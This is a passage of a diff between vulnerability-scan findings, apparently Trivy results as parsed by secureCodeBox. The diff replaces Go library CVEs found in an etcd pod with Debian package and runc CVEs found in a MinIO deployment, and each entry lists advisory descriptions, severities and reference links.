"scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "description": "_is_safe in the File::Temp module for Perl does not properly handle symlinks.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "ParseAcceptLanguage takes a long time to parse complex tags", + "name": "perl: File::Temp insecure temporary file handling", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-32149", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-32149", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32149", - }, - { - "type": "URL", - "value": "https://github.com/advisories/GHSA-69ch-w2m2-3vjp", - }, - { - "type": "URL", - "value": "https://github.com/golang/go/issues/56152", - }, - { - "type": "URL", - "value": "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c", - }, - { - "type": "URL", - "value": "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c (v0.3.8)", + "value": "https://avd.aquasec.com/nvd/cve-2011-4116", }, { "type": "URL", - "value": "https://go.dev/cl/442235", + "value": "http://www.openwall.com/lists/oss-security/2011/11/04/2", }, { "type": "URL", - "value": "https://go.dev/issue/56152", + "value": "http://www.openwall.com/lists/oss-security/2011/11/04/4", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/-hjNw559_tE/m/KlGTfid5CAAJ", + "value": "https://access.redhat.com/security/cve/CVE-2011-4116", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-dev/c/qfPIly0X7aU", + "value": "https://github.com/Perl-Toolchain-Gang/File-Temp/issues/14", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-32149", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2011-4116", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-1059", + "value": "https://rt.cpan.org/Public/Bug/Display.html?id=69106", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5873-1", + "value": "https://seclists.org/oss-sec/2011/q4/238", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-32149", + "value": "https://www.cve.org/CVERecord?id=CVE-2011-4116", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "0.0.0-20220314234659-1baeb1ce4c0b", - "foundIn": "Target: 'usr/local/bin/etcd-3.5.3' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-27191", - "installedVersion": "v0.0.0-20220131195533-30dcbda58838", - "packageName": "golang.org/x/crypto", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-31486", + "installedVersion": "5.32.1-4+deb11u2", + "packageName": "perl-base", "references": [ - "https://access.redhat.com/errata/RHSA-2022:8008", - "https://access.redhat.com/security/cve/CVE-2022-27191", - "https://bugzilla.redhat.com/1939485", - "https://bugzilla.redhat.com/1989564", - "https://bugzilla.redhat.com/1989570", - "https://bugzilla.redhat.com/1989575", - "https://bugzilla.redhat.com/2064702", - "https://bugzilla.redhat.com/2121445", - "https://bugzilla.redhat.com/2121453", - "https://errata.almalinux.org/9/ALSA-2022-8008.html", - "https://github.com/advisories/GHSA-8c26-wmh5-6g9v", - "https://go.dev/cl/392355", - "https://go.googlesource.com/crypto/+/1baeb1ce4c0b006eff0f294c47cb7617598dfb3d", - "https://groups.google.com/g/golang-announce", - "https://groups.google.com/g/golang-announce/c/-cp44ypCT5s", - "https://groups.google.com/g/golang-announce/c/-cp44ypCT5s/m/wmegxkLiAQAJ", - "https://linux.oracle.com/cve/CVE-2022-27191.html", - "https://linux.oracle.com/errata/ELSA-2022-8008.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DLUJZV3HBP56ADXU6QH2V7RNYUPMVBXQ/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EZ3S7LB65N54HXXBCB67P4TTOHTNPP5O/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HHGBEGJ54DZZGTXFUQNS7ZIG3E624YAF/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/J5WPM42UR6XIBQNQPNQHM32X7S4LJTRX/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QTFOIDHQRGNI4P6LYN6ILH5G443RYYKB/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YHYRQB7TRMHDB3NEHW5XBRG7PPMUTPGV/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZFUNHFHQVJSADNH7EZ3B53CYDZVEEPBP/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZQNPPQWSTP2IX7SHE6TS4SP4EVMI5EZK/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-27191", - "https://pkg.go.dev/vuln/GO-2021-0356", - "https://raw.githubusercontent.com/golang/vulndb/df2d3d326300e2ae768f00351ffa96cc2c56cf54/reports/GO-2021-0356.yaml", - "https://security.netapp.com/advisory/ntap-20220429-0002/", - "https://www.cve.org/CVERecord?id=CVE-2022-27191", + "http://www.openwall.com/lists/oss-security/2023/04/29/1", + "http://www.openwall.com/lists/oss-security/2023/05/03/3", + "http://www.openwall.com/lists/oss-security/2023/05/03/5", + "http://www.openwall.com/lists/oss-security/2023/05/07/2", + "https://blog.hackeriet.no/perl-http-tiny-insecure-tls-default-affects-cpan-modules/", + "https://github.com/chansen/p5-http-tiny/pull/153", + "https://hackeriet.github.io/cpan-http-tiny-overview/", + "https://www.openwall.com/lists/oss-security/2023/04/18/14", + "https://www.openwall.com/lists/oss-security/2023/05/03/4", + "https://www.reddit.com/r/perl/comments/111tadi/psa_httptiny_disabled_ssl_verification_by_default/", ], }, "category": "Vulnerability", - "description": "The golang.org/x/crypto/ssh package before 0.0.0-20220314234659-1baeb1ce4c0b for Go allows an attacker to crash a server in certain circumstances involving AddHostKey.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "description": "HTTP::Tiny before 0.083, a Perl core module since 5.13.9 and available standalone on CPAN, has an insecure default TLS configuration where users must opt in to verify certificates.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "crash in a golang.org/x/crypto/ssh server", + "name": "HTTP::Tiny before 0.083, a Perl core module since 5.13.9 and available ...", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-27191", + "value": "https://avd.aquasec.com/nvd/cve-2023-31486", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:8008", + "value": "http://www.openwall.com/lists/oss-security/2023/04/29/1", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-27191", + "value": "http://www.openwall.com/lists/oss-security/2023/05/03/3", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/1939485", + "value": "http://www.openwall.com/lists/oss-security/2023/05/03/5", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/1989564", + "value": "http://www.openwall.com/lists/oss-security/2023/05/07/2", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/1989570", + "value": "https://blog.hackeriet.no/perl-http-tiny-insecure-tls-default-affects-cpan-modules/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/1989575", + "value": "https://github.com/chansen/p5-http-tiny/pull/153", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2064702", + "value": "https://hackeriet.github.io/cpan-http-tiny-overview/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2121445", + "value": "https://www.openwall.com/lists/oss-security/2023/04/18/14", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2121453", + "value": "https://www.openwall.com/lists/oss-security/2023/05/03/4", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-8008.html", + "value": "https://www.reddit.com/r/perl/comments/111tadi/psa_httptiny_disabled_ssl_verification_by_default/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2005-2541", + "installedVersion": "1.34+dfsg-1", + "packageName": "tar", + "references": [ + "http://marc.info/?l=bugtraq&m=112327628230258&w=2", + "https://access.redhat.com/security/cve/CVE-2005-2541", + "https://lists.apache.org/thread.html/rc713534b10f9daeee2e0990239fa407e2118e4aa9e88a7041177497c@%3Cissues.guacamole.apache.org%3E", + "https://nvd.nist.gov/vuln/detail/CVE-2005-2541", + "https://www.cve.org/CVERecord?id=CVE-2005-2541", + ], + }, + "category": "Vulnerability", + "description": "Tar 1.15.1 does not properly warn the user when extracting setuid or setgid files, which may allow local users or remote attackers to gain privileges.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "tar: does not properly warn the user when extracting setuid or setgid files", + "references": [ { "type": "URL", - "value": "https://github.com/advisories/GHSA-8c26-wmh5-6g9v", + "value": "https://avd.aquasec.com/nvd/cve-2005-2541", }, { "type": "URL", - "value": "https://go.dev/cl/392355", + "value": "http://marc.info/?l=bugtraq&m=112327628230258&w=2", }, { "type": "URL", - "value": "https://go.googlesource.com/crypto/+/1baeb1ce4c0b006eff0f294c47cb7617598dfb3d", + "value": "https://access.redhat.com/security/cve/CVE-2005-2541", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce", + "value": "https://lists.apache.org/thread.html/rc713534b10f9daeee2e0990239fa407e2118e4aa9e88a7041177497c@%3Cissues.guacamole.apache.org%3E", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/-cp44ypCT5s", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2005-2541", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/-cp44ypCT5s/m/wmegxkLiAQAJ", + "value": "https://www.cve.org/CVERecord?id=CVE-2005-2541", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-48303", + "installedVersion": "1.34+dfsg-1", + "packageName": "tar", + "references": [ + "https://access.redhat.com/errata/RHSA-2023:0959", + "https://access.redhat.com/security/cve/CVE-2022-48303", + "https://bugzilla.redhat.com/2149722", + "https://bugzilla.redhat.com/show_bug.cgi?id=2149722", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-48303", + "https://errata.almalinux.org/9/ALSA-2023-0959.html", + "https://errata.rockylinux.org/RLSA-2023:0959", + "https://linux.oracle.com/cve/CVE-2022-48303.html", + "https://linux.oracle.com/errata/ELSA-2023-0959.html", + "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CRY7VEL4AIG3GLIEVCTOXRZNSVYDYYUD/", + "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/X5VQYCO52Z7GAVCLRYUITN7KXHLRZQS4/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-48303", + "https://savannah.gnu.org/bugs/?62387", + "https://savannah.gnu.org/patch/?10307", + "https://ubuntu.com/security/notices/USN-5900-1", + "https://ubuntu.com/security/notices/USN-5900-2", + "https://www.cve.org/CVERecord?id=CVE-2022-48303", + ], + }, + "category": "Vulnerability", + "description": "GNU Tar through 1.34 has a one-byte out-of-bounds read that results in use of uninitialized memory for a conditional jump. Exploitation to change the flow of control has not been demonstrated. The issue occurs in from_header in list.c via a V7 archive in which mtime has approximately 11 whitespace characters.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "heap buffer overflow at from_header() in list.c via specially crafted checksum", + "references": [ { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-27191.html", + "value": "https://avd.aquasec.com/nvd/cve-2022-48303", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-8008.html", + "value": "https://access.redhat.com/errata/RHSA-2023:0959", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DLUJZV3HBP56ADXU6QH2V7RNYUPMVBXQ/", + "value": "https://access.redhat.com/security/cve/CVE-2022-48303", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EZ3S7LB65N54HXXBCB67P4TTOHTNPP5O/", + "value": "https://bugzilla.redhat.com/2149722", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HHGBEGJ54DZZGTXFUQNS7ZIG3E624YAF/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2149722", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/J5WPM42UR6XIBQNQPNQHM32X7S4LJTRX/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-48303", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QTFOIDHQRGNI4P6LYN6ILH5G443RYYKB/", + "value": "https://errata.almalinux.org/9/ALSA-2023-0959.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", + "value": "https://errata.rockylinux.org/RLSA-2023:0959", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YHYRQB7TRMHDB3NEHW5XBRG7PPMUTPGV/", + "value": "https://linux.oracle.com/cve/CVE-2022-48303.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", + "value": "https://linux.oracle.com/errata/ELSA-2023-0959.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZFUNHFHQVJSADNH7EZ3B53CYDZVEEPBP/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CRY7VEL4AIG3GLIEVCTOXRZNSVYDYYUD/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZQNPPQWSTP2IX7SHE6TS4SP4EVMI5EZK/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/X5VQYCO52Z7GAVCLRYUITN7KXHLRZQS4/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-48303", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-27191", + "value": "https://savannah.gnu.org/bugs/?62387", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2021-0356", + "value": "https://savannah.gnu.org/patch/?10307", }, { "type": "URL", - "value": "https://raw.githubusercontent.com/golang/vulndb/df2d3d326300e2ae768f00351ffa96cc2c56cf54/reports/GO-2021-0356.yaml", + "value": "https://ubuntu.com/security/notices/USN-5900-1", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220429-0002/", + "value": "https://ubuntu.com/security/notices/USN-5900-2", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-27191", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-48303", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "0.0.0-20211209124913-491a49abca63", - "foundIn": "Target: 'usr/local/bin/etcd-3.5.3' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2021-44716", - "installedVersion": "v0.0.0-20211112202133-69e39bad7dc2", - "packageName": "golang.org/x/net", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-0563", + "installedVersion": "2.36.1-8+deb11u1", + "packageName": "util-linux", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-44716", - "https://cert-portal.siemens.com/productcert/pdf/ssa-744259.pdf", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44716", - "https://github.com/advisories/GHSA-vc3p-29h2-gpcp", - "https://github.com/golang/go/commit/48d948963c5ce7add72af5665a871caff6c1d35a (go1.17.5)", - "https://github.com/golang/go/issues/50058", - "https://github.com/golang/net/commit/491a49abca63de5e07ef554052d180a1b5fe2d70", - "https://go.dev/cl/369794", - "https://go.dev/issue/50058", - "https://groups.google.com/g/golang-announce/c/hcmEScgc00k", - "https://groups.google.com/g/golang-announce/c/hcmEScgc00k/m/ZWnOjeY4CQAJ", - "https://linux.oracle.com/cve/CVE-2021-44716.html", - "https://linux.oracle.com/errata/ELSA-2022-0001.html", - "https://lists.debian.org/debian-lts-announce/2022/01/msg00016.html", - "https://lists.debian.org/debian-lts-announce/2022/01/msg00017.html", - "https://lists.debian.org/debian-lts-announce/2023/04/msg00021.html", - "https://nvd.nist.gov/vuln/detail/CVE-2021-44716", - "https://pkg.go.dev/vuln/GO-2022-0288", - "https://security.gentoo.org/glsa/202208-02", - "https://security.netapp.com/advisory/ntap-20220121-0002/", - "https://www.cve.org/CVERecord?id=CVE-2021-44716", + "https://access.redhat.com/security/cve/CVE-2022-0563", + "https://blog.trailofbits.com/2023/02/16/suid-logic-bug-linux-readline/", + "https://lore.kernel.org/util-linux/20220214110609.msiwlm457ngoic6w@ws.net.home/T/#u", + "https://nvd.nist.gov/vuln/detail/CVE-2022-0563", + "https://security.netapp.com/advisory/ntap-20220331-0002/", + "https://www.cve.org/CVERecord?id=CVE-2022-0563", ], }, "category": "Vulnerability", - "description": "net/http in Go before 1.16.12 and 1.17.x before 1.17.5 allows uncontrolled memory consumption in the header canonicalization cache via HTTP/2 requests.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "description": "A flaw was found in the util-linux chfn and chsh utilities when compiled with Readline support. The Readline library uses an "INPUTRC" environment variable to get a path to the library config file. When the library cannot parse the specified file, it prints an error message containing data from the file. This flaw allows an unprivileged user to read root-owned files, potentially leading to privilege escalation. This flaw affects util-linux versions prior to 2.37.4.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "golang: net/http: limit growth of header canonicalization cache", + "name": "util-linux: partial disclosure of arbitrary files in chfn and chsh when compiled with libreadline", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-44716", + "value": "https://avd.aquasec.com/nvd/cve-2022-0563", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-44716", + "value": "https://access.redhat.com/security/cve/CVE-2022-0563", }, { "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-744259.pdf", + "value": "https://blog.trailofbits.com/2023/02/16/suid-logic-bug-linux-readline/", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44716", + "value": "https://lore.kernel.org/util-linux/20220214110609.msiwlm457ngoic6w@ws.net.home/T/#u", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-vc3p-29h2-gpcp", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-0563", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/48d948963c5ce7add72af5665a871caff6c1d35a (go1.17.5)", + "value": "https://security.netapp.com/advisory/ntap-20220331-0002/", }, { "type": "URL", - "value": "https://github.com/golang/go/issues/50058", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-0563", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": "1.1.5", + "foundIn": "Target: 'opt/bitnami/common/bin/gosu' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2023-27561", + "installedVersion": "v1.0.1", + "packageName": "github.com/opencontainers/runc", + "references": [ + "https://access.redhat.com/security/cve/CVE-2023-27561", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27561", + "https://gist.github.com/LiveOverflow/c937820b688922eb127fb760ce06dab9", + "https://github.com/advisories/GHSA-vpvm-3wq2-2wvm", + "https://github.com/opencontainers/runc/issues/2197#issuecomment-1437617334", + "https://github.com/opencontainers/runc/issues/3751", + "https://github.com/opencontainers/runc/pull/3785", + "https://github.com/opencontainers/runc/releases/tag/v1.1.5", + "https://lists.debian.org/debian-lts-announce/2023/03/msg00023.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DHGVGGMKGZSJ7YO67TGGPFEHBYMS63VF/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FYVE3GB4OG3BNT5DLQHYO4M5SXX33AQ5/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/I6BF24VCZRFTYBTT3T7HDZUOTKOTNPLZ/", + "https://nvd.nist.gov/vuln/detail/CVE-2023-27561", + "https://ubuntu.com/security/notices/USN-6088-1", + "https://ubuntu.com/security/notices/USN-6088-2", + "https://www.cve.org/CVERecord?id=CVE-2023-27561", + ], + }, + "category": "Vulnerability", + "description": "runc through 1.1.4 has Incorrect Access Control leading to Escalation of Privileges, related to libcontainer/rootfs_linux.go. To exploit this, an attacker must be able to spawn two containers with custom volume-mount configurations, and be able to run custom images. NOTE: this issue exists because of a CVE-2019-19921 regression.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "volume mount race condition (regression of CVE-2019-19921)", + "references": [ { "type": "URL", - "value": "https://github.com/golang/net/commit/491a49abca63de5e07ef554052d180a1b5fe2d70", + "value": "https://avd.aquasec.com/nvd/cve-2023-27561", }, { "type": "URL", - "value": "https://go.dev/cl/369794", + "value": "https://access.redhat.com/security/cve/CVE-2023-27561", }, { "type": "URL", - "value": "https://go.dev/issue/50058", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27561", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/hcmEScgc00k", + "value": "https://gist.github.com/LiveOverflow/c937820b688922eb127fb760ce06dab9", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/hcmEScgc00k/m/ZWnOjeY4CQAJ", + "value": "https://github.com/advisories/GHSA-vpvm-3wq2-2wvm", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-44716.html", + "value": "https://github.com/opencontainers/runc/issues/2197#issuecomment-1437617334", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-0001.html", + "value": "https://github.com/opencontainers/runc/issues/3751", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/01/msg00016.html", + "value": "https://github.com/opencontainers/runc/pull/3785", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/01/msg00017.html", + "value": "https://github.com/opencontainers/runc/releases/tag/v1.1.5", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/04/msg00021.html", + "value": "https://lists.debian.org/debian-lts-announce/2023/03/msg00023.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-44716", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DHGVGGMKGZSJ7YO67TGGPFEHBYMS63VF/", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-0288", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FYVE3GB4OG3BNT5DLQHYO4M5SXX33AQ5/", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202208-02", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/I6BF24VCZRFTYBTT3T7HDZUOTKOTNPLZ/", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220121-0002/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-27561", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-44716", + "value": "https://ubuntu.com/security/notices/USN-6088-1", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-6088-2", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-27561", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "0.0.0-20220906165146-f3363e06e74c", - "foundIn": "Target: 'usr/local/bin/etcd-3.5.3' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-27664", - "installedVersion": "v0.0.0-20211112202133-69e39bad7dc2", - "packageName": "golang.org/x/net", + "fixedVersion": "1.1.0", + "foundIn": "Target: 'opt/bitnami/common/bin/gosu' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2021-43784", + "installedVersion": "v1.0.1", + "packageName": "github.com/opencontainers/runc", "references": [ - "https://access.redhat.com/errata/RHSA-2023:2357", - "https://access.redhat.com/security/cve/CVE-2022-27664", - "https://bugzilla.redhat.com/2107371", - "https://bugzilla.redhat.com/2107374", - "https://bugzilla.redhat.com/2107383", - "https://bugzilla.redhat.com/2107386", - "https://bugzilla.redhat.com/2107388", - "https://bugzilla.redhat.com/2113814", - "https://bugzilla.redhat.com/2124669", - "https://bugzilla.redhat.com/2132868", - "https://bugzilla.redhat.com/2132872", - "https://bugzilla.redhat.com/2161274", - "https://bugzilla.redhat.com/show_bug.cgi?id=1913333", - "https://bugzilla.redhat.com/show_bug.cgi?id=1913338", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", - "https://bugzilla.redhat.com/show_bug.cgi?id=2113814", - "https://bugzilla.redhat.com/show_bug.cgi?id=2124669", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28851", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28852", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27664", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30630", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30632", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30635", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32148", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32189", - "https://errata.almalinux.org/9/ALSA-2023-2357.html", - "https://errata.rockylinux.org/RLSA-2022:7129", - "https://github.com/advisories/GHSA-69cg-p879-7622", - "https://github.com/golang/go/commit/5bc9106458fc07851ac324a4157132a91b1f3479 (go1.18.6)", - "https://github.com/golang/go/commit/9cfe4e258b1c9d4a04a42539c21c7bdb2e227824 (go1.19.1)", - "https://github.com/golang/go/issues/54658", - "https://go.dev/cl/428735", - "https://go.dev/issue/54658", - "https://groups.google.com/g/golang-announce", - "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s", - "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s/m/0tgO0pjiBQAJ", - "https://linux.oracle.com/cve/CVE-2022-27664.html", - "https://linux.oracle.com/errata/ELSA-2023-2802.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXKTHIGE5F576MAPFYCIJXNRGBSPISUF/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TXS2OQ57KZC5XZKK5UW4SYKPVQAHIOJX/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-27664", - "https://pkg.go.dev/vuln/GO-2022-0969", - "https://security.gentoo.org/glsa/202209-26", - "https://security.netapp.com/advisory/ntap-20220923-0004/", - "https://ubuntu.com/security/notices/USN-6038-1", - "https://www.cve.org/CVERecord?id=CVE-2022-27664", + "https://access.redhat.com/security/cve/CVE-2021-43784", + "https://bugs.chromium.org/p/project-zero/issues/detail?id=2241", + "https://github.com/advisories/GHSA-v95c-p5hm-xq8f", + "https://github.com/opencontainers/runc/commit/9c444070ec7bb83995dbc0185da68284da71c554", + "https://github.com/opencontainers/runc/commit/d72d057ba794164c3cce9451a00b72a78b25e1ae", + "https://github.com/opencontainers/runc/commit/dde509df4e28cec33b3c99c6cda3d4fd5beafc77", + "https://github.com/opencontainers/runc/commit/f50369af4b571e358f20b139eea52d612eb55eed", + "https://github.com/opencontainers/runc/security/advisories/GHSA-v95c-p5hm-xq8f", + 